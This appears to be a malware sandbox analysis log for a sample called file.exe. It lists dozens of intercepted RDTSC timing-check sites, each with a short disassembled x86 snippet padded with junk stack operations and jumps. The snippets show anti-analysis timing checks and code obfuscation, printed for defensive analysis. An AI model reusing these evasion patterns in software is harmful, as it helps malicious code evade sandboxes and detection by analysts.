              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 305C3D second address: 305C41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 37A419 second address: 37A41F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 37A41F second address: 37A423 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 37A423 second address: 37A43C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FE9047A81CFh 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 37A9E1 second address: 37AA02 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b jmp 00007FE90543D6C4h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 37AA02 second address: 37AA08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 37AA08 second address: 37AA28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007FE90543D6C6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 37AB6B second address: 37AB70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 37AB70 second address: 37AB91 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE90543D6BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pushad 0x0000000d popad 0x0000000e pop ecx 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 jl 00007FE90543D6B6h 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a popad 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 38262F second address: 38264A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jmp 00007FE9047A81CCh 0x0000000b pushad 0x0000000c popad 0x0000000d jno 00007FE9047A81C6h 0x00000013 popad 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 38694E second address: 386952 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 386C67 second address: 386C77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 386C77 second address: 386C93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE90543D6C8h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 386C93 second address: 386C9F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 js 00007FE9047A81C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 387113 second address: 387119 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 38669F second address: 3866A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3866A3 second address: 3866AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3876B0 second address: 3876B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3876B6 second address: 3876C9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FE90543D6BDh 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3879C5 second address: 3879E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 jo 00007FE9047A81C6h 0x0000000c push edi 0x0000000d pop edi 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FE9047A81CCh 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3879E6 second address: 387A00 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FE90543D6C0h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 38BF32 second address: 38BF3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FE9047A81C6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 38C221 second address: 38C250 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 pop eax 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 pop esi 0x00000008 push edi 0x00000009 jbe 00007FE90543D6B6h 0x0000000f pop edi 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FE90543D6C4h 0x0000001a jc 00007FE90543D6B6h 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 38C250 second address: 38C26A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007FE9047A81CEh 0x0000000c pushad 0x0000000d popad 0x0000000e jng 00007FE9047A81C6h 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 38CAD1 second address: 38CAEE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007FE90543D6C1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 38CAEE second address: 38CAF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 38CAF4 second address: 38CAF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 38CAF8 second address: 38CB1B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9047A81D9h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 38CB1B second address: 38CB4A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE90543D6C1h 0x00000007 jmp 00007FE90543D6C0h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jnp 00007FE90543D6BEh 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 38CC8B second address: 38CC96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 38CFB3 second address: 38CFB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 38CFB7 second address: 38CFCD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9047A81D2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3311E3 second address: 3311EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push esi 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop esi 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3311EE second address: 3311F3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3311F3 second address: 3311F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3311F9 second address: 331201 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 38BC67 second address: 38BC6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 38BC6D second address: 38BC81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FE9047A81C8h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c jc 00007FE9047A81CEh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 390D66 second address: 390D6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 390D6C second address: 390D7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jne 00007FE9047A81C6h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 390D7B second address: 390D81 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 390D81 second address: 390D8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 390D8D second address: 390DB0 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FE90543D6B6h 0x00000008 jmp 00007FE90543D6C2h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 390DB0 second address: 390DB6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 390DB6 second address: 390DBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 390DBC second address: 390DC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 390DC0 second address: 390DC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 355923 second address: 355961 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9047A81D7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c push edi 0x0000000d pop edi 0x0000000e jmp 00007FE9047A81D8h 0x00000013 popad 0x00000014 pushad 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 355961 second address: 3306DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 jmp 00007FE90543D6BBh 0x0000000c lea eax, dword ptr [ebp+1248D682h] 0x00000012 push 00000000h 0x00000014 push ecx 0x00000015 call 00007FE90543D6B8h 0x0000001a pop ecx 0x0000001b mov dword ptr [esp+04h], ecx 0x0000001f add dword ptr [esp+04h], 00000016h 0x00000027 inc ecx 0x00000028 push ecx 0x00000029 ret 0x0000002a pop ecx 0x0000002b ret 0x0000002c mov dword ptr [ebp+1245A8EFh], eax 0x00000032 push eax 0x00000033 jmp 00007FE90543D6C0h 0x00000038 mov dword ptr [esp], eax 0x0000003b call 00007FE90543D6C0h 0x00000040 push ebx 0x00000041 sub dword ptr [ebp+122D1B65h], ebx 0x00000047 pop edi 0x00000048 pop edx 0x00000049 jmp 00007FE90543D6BEh 0x0000004e call dword ptr [ebp+122D391Ch] 0x00000054 pushad 0x00000055 pushad 0x00000056 push eax 0x00000057 push edx 0x00000058 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 355E51 second address: 355E57 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 355FC6 second address: 356009 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE90543D6BCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FE90543D6C0h 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 jp 00007FE90543D6BEh 0x00000019 mov eax, dword ptr [eax] 0x0000001b push eax 0x0000001c push edx 0x0000001d jne 00007FE90543D6BCh 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 356009 second address: 35600F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35600F second address: 35606A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c jl 00007FE90543D6C8h 0x00000012 pop eax 0x00000013 push 00000000h 0x00000015 push ebx 0x00000016 call 00007FE90543D6B8h 0x0000001b pop ebx 0x0000001c mov dword ptr [esp+04h], ebx 0x00000020 add dword ptr [esp+04h], 0000001Ah 0x00000028 inc ebx 0x00000029 push ebx 0x0000002a ret 0x0000002b pop ebx 0x0000002c ret 0x0000002d mov edi, 69F1ECA1h 0x00000032 push 045A28BBh 0x00000037 pushad 0x00000038 pushad 0x00000039 ja 00007FE90543D6B6h 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35621A second address: 356220 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35639B second address: 35639F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 356A4C second address: 356A53 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 356929 second address: 35692D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 356C47 second address: 356C55 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 356C55 second address: 356C59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 391069 second address: 391092 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9047A81CFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jc 00007FE9047A81CEh 0x0000000f jns 00007FE9047A81C6h 0x00000015 pushad 0x00000016 popad 0x00000017 pop esi 0x00000018 push edi 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3911B2 second address: 3911EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FE90543D6C1h 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f js 00007FE90543D6B6h 0x00000015 jmp 00007FE90543D6C7h 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3911EA second address: 391202 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9047A81D4h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 391353 second address: 391357 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 391357 second address: 39135B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39135B second address: 391361 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 391361 second address: 39136A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39136A second address: 391370 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 391370 second address: 39139B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE9047A81D4h 0x00000009 jmp 00007FE9047A81D2h 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39139B second address: 3913AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007FE90543D6B6h 0x00000009 pushad 0x0000000a popad 0x0000000b jns 00007FE90543D6B6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39163F second address: 391643 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 391643 second address: 39164F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39164F second address: 391653 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3918C5 second address: 3918CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3918CD second address: 3918D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3949CE second address: 3949E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FE90543D6C1h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 394B54 second address: 394B74 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9047A81D4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jng 00007FE9047A81C6h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 394B74 second address: 394B78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 397471 second address: 397475 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 397140 second address: 397162 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007FE90543D6BEh 0x0000000d popad 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 jnp 00007FE90543D6B6h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 397162 second address: 397181 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push ebx 0x00000007 jne 00007FE9047A81D2h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39BA13 second address: 39BA61 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FE90543D6CEh 0x00000008 jmp 00007FE90543D6C8h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 pushad 0x00000011 jnp 00007FE90543D6B6h 0x00000017 jmp 00007FE90543D6C9h 0x0000001c pushad 0x0000001d popad 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 jnp 00007FE90543D6B6h 0x00000027 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39BA61 second address: 39BA7E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FE9047A81D4h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39BBC7 second address: 39BBCD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39BCFB second address: 39BD03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39BD03 second address: 39BD09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39F029 second address: 39F071 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FE9047A81D3h 0x00000008 jc 00007FE9047A81C6h 0x0000000e je 00007FE9047A81C6h 0x00000014 popad 0x00000015 pushad 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 push edi 0x00000019 pop edi 0x0000001a jmp 00007FE9047A81D7h 0x0000001f popad 0x00000020 pop edx 0x00000021 pop eax 0x00000022 push eax 0x00000023 push edx 0x00000024 push edx 0x00000025 push eax 0x00000026 pop eax 0x00000027 pop edx 0x00000028 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39E780 second address: 39E784 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39E8EF second address: 39E8F5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 39EA79 second address: 39EA7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A3412 second address: 3A3425 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 jnc 00007FE9047A81CCh 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A3425 second address: 3A343D instructions: 0x00000000 rdtsc 0x00000002 jg 00007FE90543D6C2h 0x00000008 jmp 00007FE90543D6BCh 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A343D second address: 3A3441 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
